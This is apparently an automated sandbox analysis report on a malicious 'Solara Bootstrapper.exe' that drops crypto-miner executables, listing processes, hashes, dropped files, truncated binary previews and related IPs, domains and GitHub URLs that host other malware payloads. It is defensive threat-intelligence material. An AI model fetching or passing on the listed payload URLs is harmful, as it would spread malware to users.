Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	75
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	2
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	Solara Bootstrapper.exe
Detection:	MAL
Classification:	mal100.spyw.evad.winEXE@110/24@2/2
EGA Information:	Successful, ratio: 66.7%
HCA Information:	Successful, ratio: 97% Number of executed functions: 215 Number of non-executed functions: 227
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, SIHClient.exe
Excluded IPs from analysis (whitelisted): 13.107.246.44, 20.109.210.53
Excluded domains from analysis (whitelisted): ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target Kawpow new.exe, PID 7244 because it is empty
Execution Graph export aborted for target SolaraBootstrapper.exe, PID 3948 because it is empty
Execution Graph export aborted for target eejhedztifcv.exe, PID 7612 because there are no executed function
Execution Graph export aborted for target eejhedztifcv.exe, PID 7948 because it is empty
Execution Graph export aborted for target xmr new.exe, PID 7376 because it is empty
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtCreateKey calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
VT rate limit hit for: Solara Bootstrapper.exe

Simulations

Behavior and APIs

Time	Type	Description
10:09:04	API Interceptor	103x Sleep call for process: powershell.exe modified
10:09:07	API Interceptor	1x Sleep call for process: Kawpow new.exe modified
10:09:07	API Interceptor	1x Sleep call for process: xmr new.exe modified
10:09:08	API Interceptor	16x Sleep call for process: SolaraBootstrapper.exe modified
10:09:50	API Interceptor	310776x Sleep call for process: winlogon.exe modified
10:09:51	API Interceptor	273428x Sleep call for process: lsass.exe modified
10:09:52	API Interceptor	35359x Sleep call for process: WmiPrvSE.exe modified
10:09:52	API Interceptor	70171x Sleep call for process: dialer.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
185.199.109.133	cr_asm3.ps1	Get hash	malicious	Unknown	Browse	raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
	gabe.ps1	Get hash	malicious	Unknown	Browse	raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
	5UIy3bo46y.dll	Get hash	malicious	Unknown	Browse	raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
	HQsitBLlOv.dll	Get hash	malicious	Unknown	Browse	raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
	steamcodegenerator.exe	Get hash	malicious	Unknown	Browse	raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
	OSLdZanXNc.exe	Get hash	malicious	Unknown	Browse	raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
	steamcodegenerator.exe	Get hash	malicious	Unknown	Browse	raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
	SecuriteInfo.com.Trojan.GenericKD.74126573.27896.28845.dll	Get hash	malicious	Metasploit	Browse	raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber_pyld.txt
	SecuriteInfo.com.Win64.MalwareX-gen.11827.5130.dll	Get hash	malicious	AsyncRAT, XWorm	Browse	raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber_pyld.txt
140.82.121.3	Winscreen.exe	Get hash	malicious	Xmrig	Browse	github.com/darkZeusWeb/loadersoft/raw/refs/heads/main/shell.exe
	stubInf.exe	Get hash	malicious	Xmrig	Browse	github.com/darkZeusWeb/loadersoft/raw/refs/heads/main/Winscreen.exe
	6glRBXzk6i.exe	Get hash	malicious	RedLine	Browse	github.com/dyrka314/Balumba/releases/download/ver2/encrypted_ImpulseCrypt_5527713376.2.exe
	firefox.lnk	Get hash	malicious	CobaltStrike	Browse	github.com/john-xor/temp/blob/main/index.html?raw=true
	0XzeMRyE1e.exe	Get hash	malicious	Amadey, Vidar	Browse	github.com/neiqops/ajajaj/raw/main/file_22613.exe
	MzRn1YNrbz.exe	Get hash	malicious	Vidar	Browse	github.com/AdobeInstal/Adobe-After-Effects-CC-2022-1.4/releases/download/123/Software.exe
	RfORrHIRNe.doc	Get hash	malicious	Unknown	Browse	github.com/ssbb36/stv/raw/main/5.mp3

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
raw.githubusercontent.com	Solara.exe	Get hash	malicious	Unknown	Browse	185.199.108.133
	3lhrJ4X.exe	Get hash	malicious	LiteHTTP Bot	Browse	185.199.111.133
	dGhlYXB0Z3JvdXA=-free.exe	Get hash	malicious	Unknown	Browse	185.199.109.133
	dGhlYXB0Z3JvdXA=-free.exe	Get hash	malicious	Unknown	Browse	185.199.110.133
	Gz1bBIg2Tw.exe	Get hash	malicious	LummaC	Browse	185.199.109.133
	ipmsg5.6.18_installer.exe	Get hash	malicious	Unknown	Browse	185.199.111.133
	over.ps1	Get hash	malicious	Vidar	Browse	185.199.109.133
	Epsilon.exe	Get hash	malicious	Unknown	Browse	185.199.111.133
	eXbhgU9.exe	Get hash	malicious	LummaC	Browse	185.199.110.133
	Purchase Order Summary Details.vbs	Get hash	malicious	LodaRAT, XRed	Browse	185.199.108.133
github.com	Solara.exe	Get hash	malicious	Unknown	Browse	140.82.121.4
	https://github.com/eclipse-ecal/ecal/releases/download/v5.13.3/ecal_5.13.3-win64.exe	Get hash	malicious	Unknown	Browse	140.82.121.3
	PO#6100008 Jan04.02.2024.Xls.js	Get hash	malicious	WSHRat, STRRAT	Browse	140.82.121.4
	ebjtOH70jl.exe	Get hash	malicious	LummaC, Amadey, Cryptbot, LummaC Stealer, Stealc, Vidar	Browse	140.82.121.3
	Gz1bBIg2Tw.exe	Get hash	malicious	LummaC	Browse	140.82.121.4
	ipmsg5.6.18_installer.exe	Get hash	malicious	Unknown	Browse	140.82.121.3
	eXbhgU9.exe	Get hash	malicious	LummaC	Browse	140.82.121.4
	fxsound_setup.exe	Get hash	malicious	Unknown	Browse	20.233.83.145
	Electrum-bch-4.4.2-x86_64.AppImage.elf	Get hash	malicious	Unknown	Browse	185.199.111.133
	OiMp3TH.exe	Get hash	malicious	LummaC	Browse	20.233.83.145

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
FASTLYUS	Solara.exe	Get hash	malicious	Unknown	Browse	185.199.108.133
	Airbornemx_PAYOUT7370.odt	Get hash	malicious	Unknown	Browse	151.101.2.137
	https://coggle.it/diagram/Z3zkZPAQxQkDOgmo/t/-/1f6434bfba7d8aab898b2531849681e8b0d7342489acbbff6b172f8658a09526	Get hash	malicious	Unknown	Browse	151.101.128.176
	https://email.garagesalefinder.com/c/eJyMU92OsjoUfZp6xwRaoO2FF-XPYT4VnXHQ8caUFivK3wcC-vYnzImc25OQlbXYa-_VJrtyniCCZ-ncwMg2KKWmPrvMCRWYGDSBBAkLnSGigttEUJpiLHRhzLK5JRHWEbE0wS1LkxzqmpnKRCMYcymIhUyJgKkr3nCVtjxPz1kp0-ZNVMUsn1_u9xogBmAAYDAMw5uqKpWnXLZp02cibUcfgEHNVcolgAEX-Q2goOUAeUsAbZ4B5Lma-bXS9YjEH8_jUsCMDFHdh-8V6xawX6ug4FFt3FtnCCFin8wJow2-DWulyU1_iVhfsfe8SpYtI8px_iiPHZXv8Movh2Cj-95Hcj0kV7urV6jyYvatjOfWaYZ2MRxIba6V3Jx55O3PcZmp2muai3lerzYyDgu0zWKnNlb-o7Sf7h6p70NxCvM23_41HfOEGuWGy9q9Hnlqfep7pO0Kfgrvm-rvV7zTOloie11_fJdEol2uDrr9xfmOPrr1Vr-IJWM_mXjnt9SPV5IVx53pOD-UrUI1qHwX-N2-JfHP9ThUm97B9z_nIOnjcuOGjloo51Iwxy6FckMA7bIrAPIMAG2RSYA8a5H18gTbKy737aLto4f-0GD3DaDdZgogj0WebZ6M8IN8ys_TY2eziPTBe70KjWKtt8gaxll5lpZ3gDzBtbpLNBsalBgGNrFuUoTHOC67JgfIGzehnVYBQAtjAC37l8GRuSOYU4G-pG2NgEYgk_ReFjwWsPli0J_MwSSdVxuc_v2bYU25I0BvMvvT0fBL_tdrsyktMAglv0Qs4o5D0vHD8ZIUFG4XwVMUFP0UQcef1jWBOkDea447drMR_PHuZATmTlIH0KIMQPP3-3_uWTOv0_JWvWU9L6semDpvmmpIeHn7fYv9HP4TAAD__7e2IkM	Get hash	malicious	HTMLPhisher	Browse	151.101.2.137
	Onedrive Shared document.html	Get hash	malicious	HTMLPhisher	Browse	151.101.2.137
	Quarantined Messages(3).zip	Get hash	malicious	HTMLPhisher	Browse	151.101.194.137
	Sales Acknowledgement - HES #982323.pdf	Get hash	malicious	Unknown	Browse	151.101.129.140
	https://docs.google.com/presentation/d/e/2PACX-1vT2PGn0zBbaptqxmzd37o4wD_789vdOk0IyvB9NJB93qGFh_af8Du5RuZX0G1lsycIP1UzhONEj31sn/pub?start=false&loop=false&delayms=3000	Get hash	malicious	Unknown	Browse	151.101.194.137
	file_83f986ef2d0592ef993924a8cc5b8d6a_2025-01-07_10_04_01_718000.zip	Get hash	malicious	Unknown	Browse	199.232.214.172
	Mansourbank Swift-TT379733 Report.svg	Get hash	malicious	Branchlock Obfuscator	Browse	151.101.193.229
GITHUBUS	Solara.exe	Get hash	malicious	Unknown	Browse	140.82.121.4
	https://github.com/eclipse-ecal/ecal/releases/download/v5.13.3/ecal_5.13.3-win64.exe	Get hash	malicious	Unknown	Browse	140.82.121.3
	PO#6100008 Jan04.02.2024.Xls.js	Get hash	malicious	WSHRat, STRRAT	Browse	140.82.121.4
	ebjtOH70jl.exe	Get hash	malicious	LummaC, Amadey, Cryptbot, LummaC Stealer, Stealc, Vidar	Browse	140.82.121.3
	Gz1bBIg2Tw.exe	Get hash	malicious	LummaC	Browse	140.82.121.4
	ipmsg5.6.18_installer.exe	Get hash	malicious	Unknown	Browse	140.82.121.3
	EdYEXasNiR.exe	Get hash	malicious	LummaC, Amadey, Babadeda, LummaC Stealer, Stealc, Vidar	Browse	140.82.121.3
	5EfYBe3nch.exe	Get hash	malicious	LummaC, Amadey, Babadeda, LiteHTTP Bot, LummaC Stealer, Poverty Stealer, Stealc	Browse	140.82.121.3
	eXbhgU9.exe	Get hash	malicious	LummaC	Browse	140.82.121.4
	rQuotation.exe	Get hash	malicious	FormBook	Browse	192.30.252.154

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
3b5074b1b5d032e5620f69f9f700ff0e	Solara.exe	Get hash	malicious	Unknown	Browse	185.199.109.133 140.82.121.3
	vRecording__0023secs__Stgusa.html	Get hash	malicious	Unknown	Browse	185.199.109.133 140.82.121.3
	ENQ-0092025.doc	Get hash	malicious	DBatLoader, PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	185.199.109.133 140.82.121.3
	U1P3u1tkB2.exe	Get hash	malicious	Unknown	Browse	185.199.109.133 140.82.121.3
	U1P3u1tkB2.exe	Get hash	malicious	Unknown	Browse	185.199.109.133 140.82.121.3
	9876567899.bat.exe	Get hash	malicious	Lokibot	Browse	185.199.109.133 140.82.121.3
	https://antiphishing.vadesecure.com/v4?f=bnJjU3hQT3pQSmNQZVE3aOMl-Yxz6sxP-_mvIRuY-wdnZ1bXTFIOIwMxyCDi0KedKx4XzS44_P2zUeNIsKUb0ScW6k1yl1_sQ4IsBBcClSw_vWV34HFG0fKKBNYTYHpo&i=SGI0YVJGNmxZNE90Z2thMHUqf298Dc88cJEXrW3w1lA&k=dFBm&r=SW5LV3JodE9QZkRVZ3JEYa6kbR5XAzhHFJ0zbTQRADrRG7ugnfE15pwrEQUVhgv3E2tVXwBw8NfFSkf3wOZ0VA&s=ecaab139c1f3315ccc0d88a6451dccec431e8ce1d856e71e5109e33657c13a3c&u=https%3A%2F%2Fsender5.zohoinsights-crm.com%2Fck1%2F2d6f.327230a%2F5f929700-cca4-11ef-973d-525400f92481%2F4cb2ae4047e7a38310b2b2641663917c123a5dec%2F2%3Fe%3DGKxHQ%252FSSm8D%252B%252B3g8VEcICaLHKdekhRU94ImygZ37tRI%253D	Get hash	malicious	Unknown	Browse	185.199.109.133 140.82.121.3
	Mes_Drivers_3.0.4.exe	Get hash	malicious	Unknown	Browse	185.199.109.133 140.82.121.3
	c2.hta	Get hash	malicious	Remcos	Browse	185.199.109.133 140.82.121.3
	setup-avast-premium-x64.exe	Get hash	malicious	Unknown	Browse	185.199.109.133 140.82.121.3

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\ProgramData\wwuujrlkomwy\eejhedztifcv.exe	Kawpow new.exe	Get hash	malicious	Unknown	Browse
	kx new.exe	Get hash	malicious	Unknown	Browse
	Solara.exe	Get hash	malicious	Unknown	Browse
C:\Users\user\AppData\Local\Temp\Kawpow new.exe	Kawpow new.exe	Get hash	malicious	Unknown	Browse
	kx new.exe	Get hash	malicious	Unknown	Browse
	Solara.exe	Get hash	malicious	Unknown	Browse

Created / dropped Files

C:\ProgramData\wwuujrlkomwy\eejhedztifcv.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\Kawpow new.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	5471744
Entropy (8bit):	6.525931537093555
Encrypted:	false
SSDEEP:	98304:gBybWc2fgjrlVrH3Y27fd2BY1z7QDkR3m1W:hic2GrrrH3Y2Bd1fIkR3m
MD5:	FB6A3B436E9F9402937D95F755B62F91
SHA1:	AEA3A8A311C2B8B6FC7D9D263B952F95A30B180E
SHA-256:	4C9D878E35E7FD497C633A770D3359FB37447985450DC19F45DB0925972C39E0
SHA-512:	7A3E2E42FE965DB1CEBC539235FEC88E277669C9A62BE2450EA4EFAF5DD93F1DE11740197FF26E697E9E9ACC499CBA2C30B64CFA5E5B35B28B9E0B93087EE2F8
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 74%
Joe Sandbox View:	Filename: Kawpow new.exe, Detection: malicious, Browse Filename: kx new.exe, Detection: malicious, Browse Filename: Solara.exe, Detection: malicious, Browse
Preview:	MZx.....................@...................................x...hr......!..L.!This program cannot be run in DOS mode.$..PE..d......f.........."...........R.....@..........@..............................T...........`.................................................H...<.............S...............S.................................(.......8...............`............................text.............................. ..`.rdata...'.......(..................@..@.data.....R.......R.................@....pdata........S......vS.............@..@.00cfg........S......xS.............@..@.tls..........S......zS.............@....reloc........S......\|S.............@..B................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\SolaraBootstrapper.exe.log

Download File

Process:	C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
File Type:	ASCII text, with CRLF line terminators
Category:	modified
Size (bytes):	954
Entropy (8bit):	5.350970057955659
Encrypted:	false
SSDEEP:	24:ML9E4KLE4KnKDE4KhKiKhPKIE4oKNzKoZAE4KzeR:MxHKLHKnYHKh3oPtHo6hAHKzeR
MD5:	3CE64235B0821B76294C3AD95F117E6C
SHA1:	FD1EC471493CE132D0D719A9771739912BEF91BF
SHA-256:	C5348C9009777CDF6C5CBD5D767A400932C0E1FA95F49DF8E797685754790850
SHA-512:	DA80BE8655187998EB5425EC801E352C386891991A4575811DE365DFD38B1325DE95A540953EC6E9305E74B1A0560968729D742A01198540CFCC166635F104C5
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.IO.Compression.FileSystem, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02b0c61bb4\System.Xml.ni.dll",0..

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	64
Entropy (8bit):	1.1940658735648508
Encrypted:	false
SSDEEP:	3:Nlllulfp6h:NllU
MD5:	159D16812BFACDBF13AC45B88C35CCD4
SHA1:	A3006CFEF77F199472CE30AD2DA618CAB631B2F3
SHA-256:	544BA61DA2E4DD6FD594E984E5004AC8857208F995FCE2E6A66DDD0E8B7B1B68
SHA-512:	967BC6F441F32AA748DE6455E82634AB7B04407D456B936C8342C353DE6336884C38339614C96205172F9CCA59C6E96FAF2AC73ED64A16ED8E159FFAAEE241C5
Malicious:	false
Preview:	@...e.................................N.?............@..........

C:\Users\user\AppData\Local\Temp\Kawpow new.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\kx new.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	5471744
Entropy (8bit):	6.525931537093555
Encrypted:	false
SSDEEP:	98304:gBybWc2fgjrlVrH3Y27fd2BY1z7QDkR3m1W:hic2GrrrH3Y2Bd1fIkR3m
MD5:	FB6A3B436E9F9402937D95F755B62F91
SHA1:	AEA3A8A311C2B8B6FC7D9D263B952F95A30B180E
SHA-256:	4C9D878E35E7FD497C633A770D3359FB37447985450DC19F45DB0925972C39E0
SHA-512:	7A3E2E42FE965DB1CEBC539235FEC88E277669C9A62BE2450EA4EFAF5DD93F1DE11740197FF26E697E9E9ACC499CBA2C30B64CFA5E5B35B28B9E0B93087EE2F8
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 74%
Joe Sandbox View:	Filename: Kawpow new.exe, Detection: malicious, Browse Filename: kx new.exe, Detection: malicious, Browse Filename: Solara.exe, Detection: malicious, Browse
Preview:	MZx.....................@...................................x...hr......!..L.!This program cannot be run in DOS mode.$..PE..d......f.........."...........R.....@..........@..............................T...........`.................................................H...<.............S...............S.................................(.......8...............`............................text.............................. ..`.rdata...'.......(..................@..@.data.....R.......R.................@....pdata........S......vS.............@..@.00cfg........S......xS.............@..@.tls..........S......zS.............@....reloc........S......\|S.............@..B................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe

Download File

Process:	C:\Users\user\Desktop\Solara Bootstrapper.exe
File Type:	PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	13312
Entropy (8bit):	4.677524556734161
Encrypted:	false
SSDEEP:	192:konexQO0FoAWyEfJkVIaqaLHmr/XKT0ifnTJ1jvVXctNjA:HnexHAWyEfJoIaqayzKAifd1LVEj
MD5:	6557BD5240397F026E675AFB78544A26
SHA1:	839E683BF68703D373B6EAC246F19386BB181713
SHA-256:	A7FECFC225DFDD4E14DCD4D1B4BA1B9F8E4D1984F1CDD8CDA3A9987E5D53C239
SHA-512:	F2399D34898A4C0C201372D2DD084EE66A66A1C3EAE949E568421FE7EDADA697468EF81F4FCAB2AFD61EAF97BCB98D6ADE2D97295E2F674E93116D142E892E97
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 33%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....)............"...0.............I... ...`....@.. ....................................`.................................?I..O....`...............................H..8............................................ ............... ..H............text....)... ..................... ..`.rsrc........`.......,..............@..@.reloc...............2..............@..B................sI......H........'... ...........................................................0..;........r...p.(....(...............(...+}......~.......(......9...............(...+}.......}.......6}.......}...... ....}........0..{....+..}......~.......(...........,'.(......r'..p..(....(....(.......s....z..........(...+}.......~.......(....&......%.......%.......%..........+'.(......r=..p..(....(....(.......s....z..6..(.............0...........(....o......rS..p(.........+8...........o..........

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1licbn4e.0go.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1uas1bpl.ght.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_532e2cnj.oqk.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5ira0ikb.vii.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_bsifrdxz.e3v.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_dglgwxap.t5a.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_etqdorbh.ajr.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fawumelu.1kv.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ld1osop1.y50.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ot0yrdtk.r54.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_pspgbk4o.ep3.ps1

Download File

